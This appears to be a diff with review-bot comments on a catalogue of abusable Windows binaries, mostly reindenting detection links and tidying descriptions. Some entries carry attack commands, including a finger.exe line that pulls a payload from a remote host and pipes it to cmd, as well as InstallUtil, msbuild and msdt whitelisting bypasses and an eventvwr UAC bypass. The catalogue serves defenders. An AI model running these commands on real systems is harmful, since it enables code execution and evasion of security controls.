|   - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml | ||||
|   - IOC: Child process from diskshadow.exe | ||||
| Resources: | ||||
|   - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
|   | ||||
| @@ -15,10 +15,10 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\Dnscmd.exe | ||||
|   - Path: C:\Windows\SysWOW64\Dnscmd.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml | ||||
|  - IOC: Dnscmd.exe loading dll from UNC/arbitrary path | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml | ||||
|   - IOC: Dnscmd.exe loading dll from UNC/arbitrary path | ||||
| Resources: | ||||
|   - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 | ||||
|   - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html | ||||
| @@ -32,4 +32,3 @@ Acknowledgement: | ||||
|     Handle: '@dim0x69' | ||||
|   - Person: Nikhil SamratAshok | ||||
|     Handle: '@nikhil_mitt' | ||||
| --- | ||||
|   | ||||
| @@ -50,14 +50,14 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\esentutl.exe | ||||
|   - Path: C:\Windows\SysWOW64\esentutl.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml | ||||
|  - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml | ||||
|   - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml | ||||
| Resources: | ||||
|   - Link: https://twitter.com/egre55/status/985994639202283520 | ||||
|   - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ | ||||
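Review bot: the re-indent carries over two Sigma references that live under `rules/windows/deprecated/` (`win_susp_vssadmin_ntds_activity.yml` and `win_susp_esentutl_activity.yml`); because each link is pinned to a commit they still resolve, but a reader following them lands on rules SigmaHQ has retired. Replace them with their successors, or mark them as deprecated in the entry, and keep the non-deprecated references listed alongside them.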
| @@ -66,5 +66,4 @@ Acknowledgement: | ||||
|   - Person: egre55 | ||||
|     Handle: '@egre55' | ||||
|   - Person: Mike Cary | ||||
|     Handle: 'grayfold3d' | ||||
| --- | ||||
|     Handle: '@grayfold3d' | ||||
|   | ||||
| @@ -7,7 +7,7 @@ Commands: | ||||
|   - Command: eventvwr.exe | ||||
|     Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. | ||||
|     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. | ||||
|     Category: UAC bypass | ||||
|     Category: UAC Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1548.002 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -31,4 +31,3 @@ Acknowledgement: | ||||
|     Handle: '@enigma0x3' | ||||
|   - Person: Matt Graeber | ||||
|     Handle: '@mattifestation' | ||||
| --- | ||||
|   | ||||
| @@ -29,10 +29,10 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\Expand.exe | ||||
|   - Path: C:\Windows\SysWOW64\Expand.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml | ||||
| Resources: | ||||
|   - Link: https://twitter.com/infosecn1nja/status/986628482858807297 | ||||
|   - Link: https://twitter.com/Oddvarmoe/status/986709068759949319 | ||||
| @@ -41,4 +41,3 @@ Acknowledgement: | ||||
|     Handle: '@infosecn1nja' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -37,4 +37,3 @@ Acknowledgement: | ||||
|     Handle: '@CyberRaiju' | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Extexport.exe | ||||
| Description: | ||||
| Description: Load a DLL located in the c:\test folder with a specific name. | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
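Review bot: the new `Description: Load a DLL located in the c:\test folder with a specific name.` describes the abuse, not the binary; elsewhere in this same change the top-level Description states the legitimate purpose (Verclsid.exe: "Used to verify a COM object before it is instantiated by Windows Explorer", Finger.exe: "Displays information about a user..."), and the abuse text belongs in the per-command `Description` and `Usecase`. Suggest a one-line statement of what Extexport.exe is (it ships under Internet Explorer, per the Full_Path entries) and moving this sentence down to the command.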
| @@ -15,7 +15,7 @@ Full_Path: | ||||
|   - Path: C:\Program Files\Internet Explorer\Extexport.exe | ||||
|   - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe | ||||
| Code_Sample: | ||||
|  - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml | ||||
|   - IOC: Extexport.exe loads dll and is execute from other folder the original path | ||||
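Review bot: while touching this block, the unchanged IOC line `Extexport.exe loads dll and is execute from other folder the original path` is ungrammatical and hard to turn into a detection; suggest `Extexport.exe loads a DLL and is executed from a folder other than its original path` so the two observable conditions (module load, unexpected image path) are explicit.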
| @@ -24,4 +24,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@hexacorn' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Extrac32.exe | ||||
| Description: | ||||
| Description: Extract to ADS, copy or overwrite a file with Extrac32.exe | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
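Review bot: `Description: Extract to ADS, copy or overwrite a file with Extrac32.exe` is a list of abuse primitives rather than a description of the tool; the field is rendered as the entry's summary, so it should say what Extrac32.exe legitimately does (a cabinet extraction utility) and leave the ADS/copy/overwrite wording to the individual command entries where it already sits.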
| @@ -38,9 +38,9 @@ Full_Path: | ||||
| Code_Sample: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml | ||||
| Resources: | ||||
|   - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| @@ -54,4 +54,3 @@ Acknowledgement: | ||||
|     Handle: '@VakninHai' | ||||
|   - Person: Tamir Yehuda | ||||
|     Handle: '@tim8288' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Findstr.exe | ||||
| Description: | ||||
| Description: Write to ADS, discover, or download files with Findstr.exe | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
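Review bot: `Description: Write to ADS, discover, or download files with Findstr.exe` again puts the use cases in the summary field; a reader scanning the index wants to know that findstr.exe is a text-search command and the per-command `Usecase` fields already carry the ADS/discover/download detail. Filling a previously empty Description is the right move, only the content should be the legitimate function.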
| @@ -36,13 +36,12 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\findstr.exe | ||||
|   - Path: C:\Windows\SysWOW64\findstr.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml | ||||
| Resources: | ||||
|   - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -1,31 +1,30 @@ | ||||
| --- | ||||
| Name: Finger.exe | ||||
| Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon | ||||
| Author: Ruben Revuelta | ||||
| Created: 2021-08-30 | ||||
| Commands: | ||||
|   - Command: finger user@example.host.com | more +2 | cmd | ||||
|     Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' | ||||
|     Usecase: Download malicious payload | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\finger.exe | ||||
|   - Path: c:\windows\syswow64\finger.exe | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml | ||||
|   - IOC: finger.exe should not be run on a normal workstation. | ||||
|   - IOC: finger.exe connecting to external resources. | ||||
| Resources: | ||||
|   - Link: https://twitter.com/DissectMalware/status/997340270273409024 | ||||
|   - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) | ||||
| Acknowledgement: | ||||
|   - Person: Ruben Revuelta (MAPFRE CERT) | ||||
|     Handle: '@rubn_RB' | ||||
|   - Person: Jose A. Jimenez (MAPFRE CERT) | ||||
|     Handle: '@Ocelotty6669' | ||||
|   - Person: Malwrologist | ||||
|     Handle: '@DissectMalware' | ||||
| --- | ||||
| --- | ||||
| Name: Finger.exe | ||||
| Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon | ||||
| Author: Ruben Revuelta | ||||
| Created: 2021-08-30 | ||||
| Commands: | ||||
|   - Command: finger user@example.host.com | more +2 | cmd | ||||
|     Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' | ||||
|     Usecase: Download malicious payload | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\finger.exe | ||||
|   - Path: c:\windows\syswow64\finger.exe | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml | ||||
|   - IOC: finger.exe should not be run on a normal workstation. | ||||
|   - IOC: finger.exe connecting to external resources. | ||||
| Resources: | ||||
|   - Link: https://twitter.com/DissectMalware/status/997340270273409024 | ||||
|   - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) | ||||
| Acknowledgement: | ||||
|   - Person: Ruben Revuelta (MAPFRE CERT) | ||||
|     Handle: '@rubn_RB' | ||||
|   - Person: Jose A. Jimenez (MAPFRE CERT) | ||||
|     Handle: '@Ocelotty6669' | ||||
|   - Person: Malwrologist | ||||
|     Handle: '@DissectMalware' | ||||
|   | ||||
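Review bot: every line of this file shows as removed and re-added although the only content change is the dropped trailing `---`, which is the signature of a line-ending (CRLF to LF) or BOM change rather than an edit; please confirm with `git diff -w` and say so in the commit message, otherwise `git blame` for the whole Finger.exe entry now points at a whitespace commit. A `.gitattributes` rule such as `*.yml text eol=lf` would stop this churn from recurring.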
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Carlos Perez | ||||
|     Handle: '@Carlos_Perez' | ||||
| --- | ||||
|   | ||||
| @@ -22,9 +22,9 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\forfiles.exe | ||||
|   - Path: C:\Windows\SysWOW64\forfiles.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml | ||||
| Resources: | ||||
|   - Link: https://twitter.com/vector_sec/status/896049052642533376 | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| @@ -34,4 +34,3 @@ Acknowledgement: | ||||
|     Handle: '@vector_sec' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -22,10 +22,10 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\ftp.exe | ||||
|   - Path: C:\Windows\SysWOW64\ftp.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml | ||||
|  - IOC: cmd /c as child process of ftp.exe | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml | ||||
|   - IOC: cmd /c as child process of ftp.exe | ||||
| Resources: | ||||
|   - Link: https://twitter.com/0xAmit/status/1070063130636640256 | ||||
|   - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939 | ||||
| @@ -37,5 +37,4 @@ Acknowledgement: | ||||
|   - Person: BennyHusted | ||||
|     Handle: '' | ||||
|   - Person: Amit Serper | ||||
|     Handle: '@0xAmit ' | ||||
| --- | ||||
|     Handle: '@0xAmit' | ||||
|   | ||||
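Review bot: trimming `'@0xAmit '` to `'@0xAmit'` is a good catch, since a trailing space breaks any exact match on handles. The same block still represents a missing handle two different ways: BennyHusted has `Handle: ''` (empty string) while other entries in this change leave `Handle:` bare (null); pick one form, ideally the bare key so consumers can test for null, and apply it across the entries.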
| @@ -176,4 +176,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Jesus Galvez | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -32,4 +32,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -35,4 +35,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -20,4 +20,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Wade Hickey | ||||
|     Handle: '@notwhickey' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Ie4uinit.exe | ||||
| Description: | ||||
| Description: Executes commands from a specially prepared ie4uinit.inf file. | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
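Review bot: `Description: Executes commands from a specially prepared ie4uinit.inf file.` describes the technique, not the binary; "specially prepared" is attacker vocabulary that belongs in the command-level `Description`. The summary should state the tool's legitimate role (an Internet Explorer per-user initialization utility that processes its own .inf) so defenders can tell expected invocations from the abuse below.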
| @@ -27,4 +27,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
|   | ||||
| @@ -34,4 +34,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -17,6 +17,7 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     OperatingSystem: Windows 10,7 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe | ||||
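Review bot: the added `OperatingSystem: Windows 10,7` does not follow the format used elsewhere in this change (`Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10`); `10,7` reads as a single odd value to anything that splits on `, ` and the unordered pair is easy to misread. Suggest `Windows 7, Windows 10`.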
| @@ -32,4 +33,3 @@ Acknowledgement: | ||||
|     Handle: '@VakninHai' | ||||
|   - Person: Lior Adar | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -15,10 +15,10 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\Infdefaultinstall.exe | ||||
|   - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe | ||||
| Code_Sample: | ||||
| - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a | ||||
|   - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml | ||||
|  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
| Resources: | ||||
|   - Link: https://twitter.com/KyleHanslovan/status/911997635455852544 | ||||
|   - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ | ||||
| @@ -26,4 +26,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Kyle Hanslovan | ||||
|     Handle: '@kylehanslovan' | ||||
| --- | ||||
|   | ||||
| @@ -7,7 +7,7 @@ Commands: | ||||
|   - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | ||||
|     Description: Execute the target .NET DLL or EXE. | ||||
|     Usecase: Use to execute code and bypass application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -24,11 +24,11 @@ Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml | ||||
|  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml | ||||
| Resources: | ||||
|   - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ | ||||
|   - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 | ||||
| @@ -39,4 +39,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -34,4 +34,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Malwrologist | ||||
|     Handle: '@DissectMalware' | ||||
| --- | ||||
|   | ||||
| @@ -40,4 +40,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -36,4 +36,3 @@ Acknowledgement: | ||||
|     Handle: '@gN3mes1s' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -56,4 +56,3 @@ Acknowledgement: | ||||
|     Handle: '@FortyNorthSec' | ||||
|   - Person: Bank Security | ||||
|     Handle: '@Bank_Security' | ||||
| --- | ||||
|   | ||||
| @@ -22,10 +22,10 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\mmc.exe | ||||
|   - Path: C:\Windows\SysWOW64\mmc.exe | ||||
| Code_Sample: | ||||
| - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml | ||||
|  - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml | ||||
| Resources: | ||||
|   - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ | ||||
|   - Link: https://offsec.almond.consulting/UAC-bypass-dotnet.html | ||||
| @@ -34,4 +34,3 @@ Acknowledgement: | ||||
|     Handle: '@bohops' | ||||
|   - Person: clem | ||||
|     Handle: '@clavoillotte' | ||||
| --- | ||||
|   | ||||
| @@ -53,4 +53,3 @@ Acknowledgement: | ||||
|     Handle: '' | ||||
|   - Person: Cedric | ||||
|     Handle: '@th3c3dr1c' | ||||
| --- | ||||
|   | ||||
| @@ -7,7 +7,7 @@ Commands: | ||||
|   - Command: msbuild.exe pshell.xml | ||||
|     Description: Build and execute a C# project stored in the target XML file. | ||||
|     Usecase: Compile and run code | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127.001 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -60,7 +60,7 @@ Detection: | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules  | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - IOC: Msbuild.exe should not normally be executed on workstations | ||||
| Resources: | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md | ||||
| @@ -77,4 +77,3 @@ Acknowledgement: | ||||
|     Handle: '@Cneelis' | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
|   | ||||
| @@ -24,4 +24,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Pierre-Alexandre Braeken | ||||
|     Handle: '@pabraeken' | ||||
| --- | ||||
|   | ||||
| @@ -14,7 +14,7 @@ Commands: | ||||
|   - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE | ||||
|     Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. | ||||
|     Usecase: Execute code bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
